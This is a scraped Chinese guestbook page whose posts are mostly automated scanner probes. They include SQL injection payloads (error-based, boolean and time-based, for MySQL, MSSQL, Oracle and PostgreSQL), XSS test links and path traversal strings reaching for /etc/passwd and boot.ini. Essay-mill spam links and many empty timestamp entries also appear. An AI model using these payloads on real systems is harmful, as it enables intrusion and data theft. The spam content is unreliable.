zrjxgiqu :
QriukW geixekfkynfi, [url=http://tsvtmrkrhqgs.com/]tsvtmrkrhqgs[/url], [link=http://syldghrrtgjr.com/]syldghrrtgjr[/link], http://ozywwlzrvzky.com/ 發表于 - 2010-03-15 02:43:48
發表于 - 2012-08-06 17:57:07
發表于 - 2012-08-06 17:57:07
發表于 - 2012-08-06 17:57:07
and 3=3 :
發表于 - 2012-08-06 17:57:07
and 3=4 :
發表于 - 2012-08-06 17:57:07
' and 'a'='a :
發表于 - 2012-08-06 17:57:07
' and 'a'='b :
發表于 - 2012-08-06 17:57:08
" and "a"="a :
發表于 - 2012-08-06 17:57:08
" and "a"="b :
發表于 - 2012-08-06 17:57:08
%' and 3=3 and '%'=' :
發表于 - 2012-08-06 17:57:08
and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 :
發表于 - 2012-08-06 17:57:08
' and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1 :
發表于 - 2012-08-06 17:57:08
%' and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '%'=' :
發表于 - 2012-08-06 17:57:08
發表于 - 2012-08-06 18:00:06
發表于 - 2012-08-06 18:00:06
發表于 - 2012-08-06 18:00:07
and 3=3 :
發表于 - 2012-08-06 18:00:07
and 3=4 :
發表于 - 2012-08-06 18:00:07
' and 'a'='a :
發表于 - 2012-08-06 18:00:07
' and 'a'='b :
發表于 - 2012-08-06 18:00:07
" and "a"="a :
發表于 - 2012-08-06 18:00:07
" and "a"="b :
發表于 - 2012-08-06 18:00:08
%' and 3=3 and '%'=' :
發表于 - 2012-08-06 18:00:08
and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 :
發表于 - 2012-08-06 18:00:08
' and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1 :
發表于 - 2012-08-06 18:00:08
%' and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '%'=' :
發表于 - 2012-08-06 18:00:08
匿名 :
and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 發表于 - 2012-10-12 09:26:17
88888 :
發表于 - 2012-10-13 02:26:17
88888 :
發表于 - 2012-10-13 02:26:17
88888 :
發表于 - 2012-10-13 02:26:17
88888 and 3=3 :
發表于 - 2012-10-13 02:26:17
88888 and 3=4 :
發表于 - 2012-10-13 02:26:18
88888' and 'a'='a :
發表于 - 2012-10-13 02:26:18
88888' and 'a'='b :
發表于 - 2012-10-13 02:26:18
88888" and "a"="a :
發表于 - 2012-10-13 02:26:18
88888" and "a"="b :
發表于 - 2012-10-13 02:26:18
88888%' and 3=3 and '%'=' :
發表于 - 2012-10-13 02:26:19
88888 and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 :
發表于 - 2012-10-13 02:26:19
88888' and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1 :
發表于 - 2012-10-13 02:26:19
88888%' and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '%'=' :
發表于 - 2012-10-13 02:26:19
發表于 - 2016-12-08 18:18:14
發表于 - 2016-12-08 19:07:17
發表于 - 2016-12-08 19:07:50
發表于 - 2016-12-08 19:08:22
發表于 - 2016-12-10 13:08:53
發表于 - 2016-12-11 12:07:58
發表于 - 2016-12-14 00:01:05
發表于 - 2016-12-14 17:57:07
發表于 - 2016-12-17 23:53:28
發表于 - 2016-12-18 04:54:11
發表于 - 2016-12-19 14:17:07
發表于 - 2016-12-22 14:30:15
發表于 - 2016-12-22 17:42:32
發表于 - 2016-12-23 20:22:04
發表于 - 2016-12-26 11:22:22
發表于 - 2017-01-02 05:20:19
發表于 - 2017-01-03 06:44:15
發表于 - 2017-01-04 17:55:18
發表于 - 2017-01-04 18:20:21
發表于 - 2017-01-10 17:35:06
發表于 - 2017-01-16 09:14:43
發表于 - 2017-01-17 20:19:24
發表于 - 2017-01-17 20:22:28
發表于 - 2017-01-18 13:32:36
發表于 - 2017-01-18 14:11:02
發表于 - 2017-01-22 08:26:19
發表于 - 2017-01-23 14:37:20
發表于 - 2017-01-25 01:39:44
發表于 - 2017-01-25 02:02:06
發表于 - 2017-01-27 21:41:53
發表于 - 2017-01-28 05:43:55
發表于 - 2017-01-28 06:00:58
發表于 - 2017-01-28 13:36:21
發表于 - 2017-01-28 16:54:42
發表于 - 2017-01-29 02:43:02
發表于 - 2017-01-29 15:44:49
發表于 - 2017-01-29 20:04:04
發表于 - 2017-01-30 00:47:15
發表于 - 2017-01-30 03:07:06
發表于 - 2017-01-30 05:22:10
發表于 - 2017-01-30 07:35:38
發表于 - 2017-01-30 09:49:20
發表于 - 2017-01-30 12:06:43
發表于 - 2017-01-30 14:29:40
發表于 - 2017-01-30 15:29:11
發表于 - 2017-01-30 16:48:35
發表于 - 2017-01-30 19:25:44
發表于 - 2017-01-30 22:14:11
發表于 - 2017-01-31 00:34:49
發表于 - 2017-01-31 01:09:42
發表于 - 2017-01-31 02:47:29
發表于 - 2017-01-31 05:01:42
發表于 - 2017-01-31 07:15:29
發表于 - 2017-01-31 09:35:14
發表于 - 2017-01-31 11:56:43
發表于 - 2017-01-31 14:16:39
發表于 - 2017-01-31 16:37:44
發表于 - 2017-01-31 21:08:47
發表于 - 2017-02-01 04:46:01
發表于 - 2017-02-03 17:40:26
發表于 - 2017-02-03 18:04:02
發表于 - 2017-02-06 09:39:04
發表于 - 2017-02-08 05:06:50
發表于 - 2017-02-08 10:36:36
發表于 - 2017-02-08 11:01:26
發表于 - 2017-02-08 18:55:53
發表于 - 2017-02-12 23:05:39
發表于 - 2017-02-13 21:18:24
發表于 - 2017-02-16 00:40:49
發表于 - 2017-02-18 02:56:53
發表于 - 2017-02-18 06:08:04
發表于 - 2017-02-18 12:44:56
發表于 - 2017-02-18 12:45:05
發表于 - 2017-02-18 12:45:05
發表于 - 2017-02-19 15:32:50
發表于 - 2017-02-19 22:19:57
發表于 - 2017-02-20 09:47:30
發表于 - 2017-02-20 22:21:05
發表于 - 2017-02-23 15:29:56
發表于 - 2017-02-23 15:30:07
發表于 - 2017-02-23 18:13:22
發表于 - 2017-02-24 01:44:47
發表于 - 2017-02-25 08:36:05
發表于 - 2017-02-25 08:36:15
發表于 - 2017-02-25 08:36:15
發表于 - 2017-02-25 08:37:09
發表于 - 2017-02-25 15:51:28
發表于 - 2017-02-25 15:51:37
發表于 - 2017-02-25 15:51:37
發表于 - 2017-02-25 15:51:37
發表于 - 2017-02-25 15:51:37
發表于 - 2017-02-26 04:24:36
發表于 - 2017-03-05 02:25:44
發表于 - 2017-03-05 18:34:08
發表于 - 2017-03-06 04:35:32
發表于 - 2017-03-07 16:38:08
發表于 - 2017-03-08 20:55:34
發表于 - 2017-03-11 20:33:34
發表于 - 2017-03-12 03:57:32
發表于 - 2017-03-12 05:31:36
發表于 - 2017-03-12 16:58:32
發表于 - 2017-03-13 22:32:51
發表于 - 2017-03-13 22:34:37
發表于 - 2017-03-14 08:24:50
發表于 - 2017-03-14 08:41:36
發表于 - 2017-03-14 09:55:07
發表于 - 2017-03-15 08:12:33
發表于 - 2017-03-15 16:34:56
發表于 - 2017-03-16 07:59:26
發表于 - 2017-03-18 15:11:27
發表于 - 2017-03-18 20:02:33
發表于 - 2017-03-19 13:08:10
發表于 - 2017-03-19 14:42:52
發表于 - 2017-03-20 22:22:52
發表于 - 2017-03-21 13:33:49
發表于 - 2017-03-21 15:06:32
發表于 - 2017-03-21 18:19:27
發表于 - 2017-03-23 09:03:04
發表于 - 2017-03-24 15:15:35
發表于 - 2017-03-25 15:32:41
發表于 - 2017-03-26 09:01:32
發表于 - 2017-03-26 23:08:28
發表于 - 2017-03-29 19:01:51
AnthonyQuima :
http://www.cdss100.org/essay-writers-wanted Essay writers wanted http://www.cdss100.org/write-on-paper Write on paper http://www.cdss100.org/writing-a-poetry-essay Writing a poetry essay http://www.cdss100.org/writing-numbers-in-an-essay Writing numbers in an essay http://www.cdss100.org/blank-paper-to-write-on Blank paper to write on http://www.cdss100.org/steps-to-writing-a-good-essay Steps to writing a good essay http://www.cdss100.org/writing-a-biography-essay Writing a biography essay http://www.cdss100.org/how-to-write-a-summary-of-a-paper How to write a summary of a paper http://www.cdss100.org/essay-help Essay help http://www.cdss100.org/essays-about-writing Essays about writing 發表于 - 2017-03-29 19:01:52
發表于 - 2017-03-29 20:03:54
發表于 - 2017-03-29 20:04:22
發表于 - 2017-03-29 21:20:33
AnthonyQuima :
http://www.cdss100.org/pumpkin-writing-paper Pumpkin writing paper http://www.cdss100.org/how-to-write-a-good-english-essay How to write a good english essay http://www.cdss100.org/write-me-essay Write me essay http://www.cdss100.org/how-to-write-an-essay-for-university How to write an essay for university http://www.cdss100.org/how-to-write-a-presentation-paper How to write a presentation paper http://www.cdss100.org/australian-essay-writing Australian essay writing http://www.cdss100.org/how-to-write-an-essay-about-yourself How to write an essay about yourself http://www.cdss100.org/how-to-write-a-brief-essay How to write a brief essay http://www.cdss100.org/how-to-write-a-thesis-statement-for-a-essay How to write a thesis statement for a essay http://www.cdss100.org/essay-on-helping-the-poor Essay on helping the poor 發表于 - 2017-03-29 21:20:34
發表于 - 2017-03-30 00:35:30
AnthonyQuima :
http://www.cdss100.org/writing-essay-on-terrorism Writing essay on terrorism http://www.cdss100.org/german-essay-writing German essay writing http://www.cdss100.org/strathmore-writing-paper Strathmore writing paper http://www.cdss100.org/lined-paper-for-kindergarten-writing Lined paper for kindergarten writing http://www.cdss100.org/pay-to-write-paper Pay to write paper http://www.cdss100.org/essay-websites Essay websites http://www.cdss100.org/how-to-write-english-paper How to write english paper http://www.cdss100.org/headed-writing-paper Headed writing paper http://www.cdss100.org/learn-how-to-write-an-essay Learn how to write an essay http://www.cdss100.org/name-writing-paper Name writing paper 發表于 - 2017-03-30 00:35:31
發表于 - 2017-03-31 04:56:05
發表于 - 2017-03-31 04:57:22
發表于 - 2017-03-31 04:57:23
發表于 - 2017-03-31 04:57:25
發表于 - 2017-03-31 04:59:27
發表于 - 2017-03-31 04:59:29
發表于 - 2017-03-31 04:59:31
發表于 - 2017-03-31 04:59:45
發表于 - 2017-03-31 04:59:46
發表于 - 2017-03-31 04:59:59
發表于 - 2017-03-31 05:00:03
發表于 - 2017-03-31 05:00:07
發表于 - 2017-03-31 05:00:32
發表于 - 2017-03-31 05:00:33
發表于 - 2017-03-31 05:00:34
發表于 - 2017-03-31 05:00:34
發表于 - 2017-03-31 05:01:44
發表于 - 2017-03-31 05:03:24
發表于 - 2017-03-31 05:03:54
發表于 - 2017-03-31 05:04:24
發表于 - 2017-03-31 05:04:34
發表于 - 2017-03-31 05:05:04
發表于 - 2017-03-31 05:05:44
發表于 - 2017-03-31 05:06:14
發表于 - 2017-03-31 05:06:24
發表于 - 2017-03-31 05:06:34
發表于 - 2017-03-31 05:06:44
88888 :
88888 發表于 - 2017-03-31 05:19:20
88888 :
88888 發表于 - 2017-03-31 05:19:22
88888 :
88888 發表于 - 2017-03-31 05:19:23
88888 :
88888) AND 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) AND (9=9 發表于 - 2017-03-31 05:19:39
88888 :
88888 AND 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) 發表于 - 2017-03-31 05:19:40
88888 :
88888, 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) 發表于 - 2017-03-31 05:19:41
88888 :
88888 OR 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) 發表于 - 2017-03-31 05:19:42
88888 :
88888 AND EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) 發表于 - 2017-03-31 05:19:44
88888 :
88888,EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) 發表于 - 2017-03-31 05:19:45
88888 :
88888) AND EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) AND (9=9 發表于 - 2017-03-31 05:19:49
88888 :
88888 OR EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) 發表于 - 2017-03-31 05:19:50
88888 :
88888) AND 1122=CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) AND (2014=2014 發表于 - 2017-03-31 05:19:55
88888 :
88888 AND 1122=CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) 發表于 - 2017-03-31 05:19:56
88888 :
88888,(SELECT CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) FROM SYSCOLUMNS) 發表于 - 2017-03-31 05:19:57
88888 :
88888 OR 1122=CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) 發表于 - 2017-03-31 05:19:58
88888 :
88888 AND 1=CHAR(106)+CHAR(106)+CHAR(106) 發表于 - 2017-03-31 05:20:01
88888 :
88888/**/AND/**/1=CHAR(106)+CHAR(106)+CHAR(106) 發表于 - 2017-03-31 05:20:03
88888 :
88888) AND 1=CHAR(106)+CHAR(106)+CHAR(106) AND (9=9 發表于 - 2017-03-31 05:20:06
88888 :
88888) AND 1122=(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL) AND (2014=2014 發表于 - 2017-03-31 05:20:11
88888 :
88888 AND 1122=(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL) 發表于 - 2017-03-31 05:20:12
88888 :
88888, 1122=(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL) 發表于 - 2017-03-31 05:20:13
88888 :
88888 OR 1122=(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL) 發表于 - 2017-03-31 05:20:14
88888 :
88888 發表于 - 2017-03-31 05:20:29
88888 :
88888" AND "cg"="6R 發表于 - 2017-03-31 05:20:30
88888 :
88888 發表于 - 2017-03-31 05:20:31
88888 :
88888 發表于 - 2017-03-31 05:20:32
88888 :
888881 發表于 - 2017-03-31 05:20:34
88888 :
88888 發表于 - 2017-03-31 05:20:38
88888 :
88888") AND 55=97 AND ("rV"="rV 發表于 - 2017-03-31 05:20:39
88888 :
88888 發表于 - 2017-03-31 05:20:40
88888 :
88888 發表于 - 2017-03-31 05:20:44
88888 :
88888%") AND 15=16 AND 1 like("% 發表于 - 2017-03-31 05:20:45
88888 :
88888 發表于 - 2017-03-31 05:20:46
88888 :
88888 RLIKE (SELECT (CASE WHEN (17=92) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 0x28 END)) 發表于 - 2017-03-31 05:20:47
88888 :
88888 RLIKE (SELECT (CASE WHEN (81=81) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 0x28 END)) 發表于 - 2017-03-31 05:20:47
88888 :
88888 RLIKE (SELECT (CASE WHEN (856=174) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 0x28 END)) 發表于 - 2017-03-31 05:20:49
88888 :
88888) RLIKE (SELECT (CASE WHEN (53=19) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 0x28 END)) AND (53=53 發表于 - 2017-03-31 05:20:49
88888 :
88888) RLIKE (SELECT (CASE WHEN (77=77) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 0x28 END)) AND (58=58 發表于 - 2017-03-31 05:20:51
88888 :
88888,(SELECT (CASE WHEN (21=88) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 21*(SELECT 21 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) 發表于 - 2017-03-31 05:20:59
88888 :
88888,(SELECT (CASE WHEN (49=49) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 49*(SELECT 49 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) 發表于 - 2017-03-31 05:20:59
88888 :
88888,(SELECT (CASE WHEN (41=76) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 41*(SELECT 41 FROM mysql.db) END)) 發表于 - 2017-03-31 05:21:01
88888 :
88888,(SELECT (CASE WHEN (57=57) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 57*(SELECT 57 FROM mysql.db) END)) 發表于 - 2017-03-31 05:21:01
88888 :
88888,(SELECT (CASE WHEN (95=11) THEN 0x34383F636F6D6D656E743D3838383838 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) 發表于 - 2017-03-31 05:21:01
88888 :
88888,(SELECT (CASE WHEN (74=74) THEN 0x34383F636F6D6D656E743D3838383838 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) 發表于 - 2017-03-31 05:21:03
88888 :
88888 發表于 - 2017-03-31 05:21:07
88888 :
88888 AND SLEEP(5) 發表于 - 2017-03-31 05:21:07
88888 :
88888AND (SELECT * FROM (SELECT(SLEEP(5)))uttes) 發表于 - 2017-03-31 05:21:07
88888 :
88888 AND 5=SLEEP(5) 發表于 - 2017-03-31 05:21:07
88888 :
88888 OR 5=SLEEP(5) 發表于 - 2017-03-31 05:21:08
88888 :
88888) AND SLEEP(5) AND (9=9 發表于 - 2017-03-31 05:21:08
88888 :
88888 OR 5=SLEEP(5) 發表于 - 2017-03-31 05:21:08
88888 :
88888,(SELECT (CASE WHEN (5=5) THEN SLEEP(5) ELSE 5*(SELECT 5 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) 發表于 - 2017-03-31 05:21:08
88888 :
88888 AND 1997=DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(99)||CHR(97)||CHR(100),5) 發表于 - 2017-03-31 05:21:09
88888 :
88888 OR 1997=DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(99)||CHR(97)||CHR(100),5) 發表于 - 2017-03-31 05:21:09
88888 :
88888 AND PG_SLEEP(5) 發表于 - 2017-03-31 05:21:09
88888 :
88888 AND 1997=PG_SLEEP(5) 發表于 - 2017-03-31 05:21:10
88888 :
88888AND 1997=(SELECT 5 FROM PG_SLEEP(5)) 發表于 - 2017-03-31 05:21:10
88888 :
88888 發表于 - 2017-03-31 05:21:10
88888 :
88888 發表于 - 2017-03-31 05:21:10
88888 :
888881 發表于 - 2017-03-31 05:21:11
88888 :
88888<a href=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#49&#50&#51&#52&#53&#41>TEST</a> 發表于 - 2017-03-31 05:22:21
88888 :
88888<a href=//webscan.#/>webscan</a> 發表于 - 2017-03-31 05:24:01
88888 :
88888%27 發表于 - 2017-03-31 05:24:31
88888 :
88888" 發表于 - 2017-03-31 05:25:00
88888 :
88888JyI= 發表于 - 2017-03-31 05:25:10
88888 :
88888 發表于 - 2017-03-31 05:25:31
88888 :
88888 發表于 - 2017-03-31 05:25:31
88888 :
88888 發表于 - 2017-03-31 05:25:31
88888 :
88888 發表于 - 2017-03-31 05:25:35
88888 :
88888 發表于 - 2017-03-31 05:25:35
88888 :
88888 發表于 - 2017-03-31 05:25:35
88888 :
88888 發表于 - 2017-03-31 05:25:35
88888 :
88888 發表于 - 2017-03-31 05:25:36
88888 :
88888 發表于 - 2017-03-31 05:25:36
88888 :
88888 發表于 - 2017-03-31 05:25:37
88888 :
88888 發表于 - 2017-03-31 05:25:37
88888 :
88888 發表于 - 2017-03-31 05:25:38
88888 :
88888 發表于 - 2017-03-31 05:25:38
88888 :
88888 發表于 - 2017-03-31 05:25:38
88888 :
88888 發表于 - 2017-03-31 05:25:39
88888 :
88888 發表于 - 2017-03-31 05:25:39
88888 :
88888 發表于 - 2017-03-31 05:25:39
88888 :
88888e360 發表于 - 2017-03-31 05:25:40
88888 :
88888 發表于 - 2017-03-31 05:25:41
88888 :
88888 發表于 - 2017-03-31 05:25:42
88888 :
88888 發表于 - 2017-03-31 05:25:42
88888 :
88888 發表于 - 2017-03-31 05:25:42
88888 :
88888 發表于 - 2017-03-31 05:25:43
88888 :
88888 發表于 - 2017-03-31 05:25:45
88888 :
88888 發表于 - 2017-03-31 05:25:45
88888 :
88888 發表于 - 2017-03-31 05:25:46
88888 :
88888 發表于 - 2017-03-31 05:25:46
88888 :
88888 發表于 - 2017-03-31 05:25:46
88888 :
88888 發表于 - 2017-03-31 05:25:46
88888 :
88888 發表于 - 2017-03-31 05:25:47
88888 :
88888 發表于 - 2017-03-31 05:25:47
88888 :
88888 發表于 - 2017-03-31 05:25:47
88888 :
88888 發表于 - 2017-03-31 05:25:47
88888 :
88888 發表于 - 2017-03-31 05:25:48
88888 :
88888 發表于 - 2017-03-31 05:25:49
88888 :
88888 發表于 - 2017-03-31 05:25:49
88888 :
88888 發表于 - 2017-03-31 05:25:50
88888 :
888886633x3X6 發表于 - 2017-03-31 05:25:50
88888 :
88888 發表于 - 2017-03-31 05:25:50
88888 :
88888 發表于 - 2017-03-31 05:25:50
88888 :
88888 發表于 - 2017-03-31 05:25:50
88888 :
88888 發表于 - 2017-03-31 05:25:50
88888 :
88888 發表于 - 2017-03-31 05:25:51
88888 :
88888 發表于 - 2017-03-31 05:25:51
88888 :
88888 發表于 - 2017-03-31 05:25:51
88888 :
88888 發表于 - 2017-03-31 05:25:51
88888 :
88888 發表于 - 2017-03-31 05:25:52
88888 :
88888 發表于 - 2017-03-31 05:25:52
88888 :
88888 發表于 - 2017-03-31 05:25:53
88888 :
88888 發表于 - 2017-03-31 05:25:53
88888 :
88888 發表于 - 2017-03-31 05:25:54
88888 :
88888 發表于 - 2017-03-31 05:25:54
88888 :
88888 發表于 - 2017-03-31 05:25:54
88888 :
88888 發表于 - 2017-03-31 05:25:55
88888 :
88888 發表于 - 2017-03-31 05:25:55
88888 :
88888 發表于 - 2017-03-31 05:25:55
88888 :
88888 發表于 - 2017-03-31 05:25:56
88888 :
88888 發表于 - 2017-03-31 05:25:57
88888 :
88888 發表于 - 2017-03-31 05:25:57
88888 :
88888 發表于 - 2017-03-31 05:25:58
88888 :
88888 發表于 - 2017-03-31 05:25:58
88888 :
88888 發表于 - 2017-03-31 05:25:58
88888 :
88888 發表于 - 2017-03-31 05:25:58
88888 :
88888 發表于 - 2017-03-31 05:25:59
88888 :
88888 發表于 - 2017-03-31 05:25:59
88888 :
88888 發表于 - 2017-03-31 05:25:59
88888 :
88888 發表于 - 2017-03-31 05:25:59
88888 :
88888 發表于 - 2017-03-31 05:26:02
88888 :
88888 發表于 - 2017-03-31 05:26:02
88888 :
88888 發表于 - 2017-03-31 05:26:02
88888 :
88888 發表于 - 2017-03-31 05:26:03
88888 :
88888 發表于 - 2017-03-31 05:26:03
88888 :
88888 發表于 - 2017-03-31 05:26:03
88888 :
88888 發表于 - 2017-03-31 05:26:03
88888 :
88888 發表于 - 2017-03-31 05:26:05
88888 :
88888 發表于 - 2017-03-31 05:26:06
88888 :
88888 發表于 - 2017-03-31 05:26:06
88888 :
88888 發表于 - 2017-03-31 05:26:06
88888 :
88888 發表于 - 2017-03-31 05:26:06
88888 :
88888 發表于 - 2017-03-31 05:26:07
88888 :
88888 發表于 - 2017-03-31 05:26:07
88888 :
88888 發表于 - 2017-03-31 05:26:07
88888 :
88888 發表于 - 2017-03-31 05:26:07
88888 :
88888 發表于 - 2017-03-31 05:26:07
88888 :
88888 發表于 - 2017-03-31 05:26:08
88888 :
88888 發表于 - 2017-03-31 05:26:08
88888 :
88888 發表于 - 2017-03-31 05:26:08
88888 :
88888 發表于 - 2017-03-31 05:26:09
88888 :
88888 發表于 - 2017-03-31 05:26:09
88888 :
88888 發表于 - 2017-03-31 05:26:09
88888 :
88888 發表于 - 2017-03-31 05:26:09
88888 :
88888 發表于 - 2017-03-31 05:26:10
88888 :
88888 發表于 - 2017-03-31 05:26:10
88888 :
88888 發表于 - 2017-03-31 05:26:10
88888 :
88888 發表于 - 2017-03-31 05:26:11
88888 :
88888 發表于 - 2017-03-31 05:26:11
88888 :
88888 發表于 - 2017-03-31 05:26:12
88888 :
88888 發表于 - 2017-03-31 05:26:12
88888 :
88888 發表于 - 2017-03-31 05:26:12
88888 :
88888 發表于 - 2017-03-31 05:26:12
88888 :
88888 發表于 - 2017-03-31 05:26:13
88888 :
88888[] 發表于 - 2017-03-31 05:26:19
88888 :
發表于 - 2017-03-31 05:26:29
88888 :
88888/ 發表于 - 2017-03-31 05:26:49
88888 :
88888) 發表于 - 2017-03-31 05:26:59
88888 :
88888!(() 發表于 - 2017-03-31 05:27:09
88888 :
88888alert(42873) 發表于 - 2017-03-31 05:27:19
88888 :
88888 發表于 - 2017-03-31 05:27:23
88888 :
../../../../../../../../boot.ini 發表于 - 2017-03-31 05:27:29
88888 :
../../../../../../../../boot.ini 發表于 - 2017-03-31 05:27:39
88888 :
發表于 - 2017-03-31 05:27:49
88888 :
../../../../../../../../boot.ini.jpg 發表于 - 2017-03-31 05:27:59
88888 :
../../../../../../../../boot.ini.html 發表于 - 2017-03-31 05:28:09
88888 :
/.\./.\./.\./.\./.\./.\./boot.ini 發表于 - 2017-03-31 05:28:19
88888 :
C:oot.ini 發表于 - 2017-03-31 05:28:29
88888 :
................oot.ini 發表于 - 2017-03-31 05:28:39
88888 :
../..//../..//../..//../..//../..//../..//../..//../..//boot.ini 發表于 - 2017-03-31 05:28:49
88888 :
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini 發表于 - 2017-03-31 05:28:59
88888 :
88888 發表于 - 2017-03-31 05:29:03
88888 :
發表于 - 2017-03-31 05:29:09
88888 :
<................oot.ini 發表于 - 2017-03-31 05:29:19
88888 :
|................oot.ini 發表于 - 2017-03-31 05:29:29
88888 :
88888 發表于 - 2017-03-31 05:29:33
88888 :
../../../../../../../../boot.ini.htm 發表于 - 2017-03-31 05:29:39
88888 :
../../../../../../../../boot.ini.txt 發表于 - 2017-03-31 05:29:49
88888 :
file:///c:/boot.ini 發表于 - 2017-03-31 05:29:59
88888 :
88888 發表于 - 2017-03-31 05:30:03
88888 :
................windowswin.ini 發表于 - 2017-03-31 05:30:09
88888 :
88888 發表于 - 2017-03-31 05:30:13
88888 :
../../../../../../../../etc/passwd 發表于 - 2017-03-31 05:30:19
88888 :
../../../../../../../../etc/passwd 發表于 - 2017-03-31 05:30:29
88888 :
../../../../../../../../etc/passwd 發表于 - 2017-03-31 05:30:39
88888 :
88888 發表于 - 2017-03-31 05:30:43
88888 :
../../../../../../../../etc/passwd.html 發表于 - 2017-03-31 05:30:49
88888 :
88888 發表于 - 2017-03-31 05:30:53
88888 :
../../../../../../../../etc/passwd.jpg 發表于 - 2017-03-31 05:30:59
88888 :
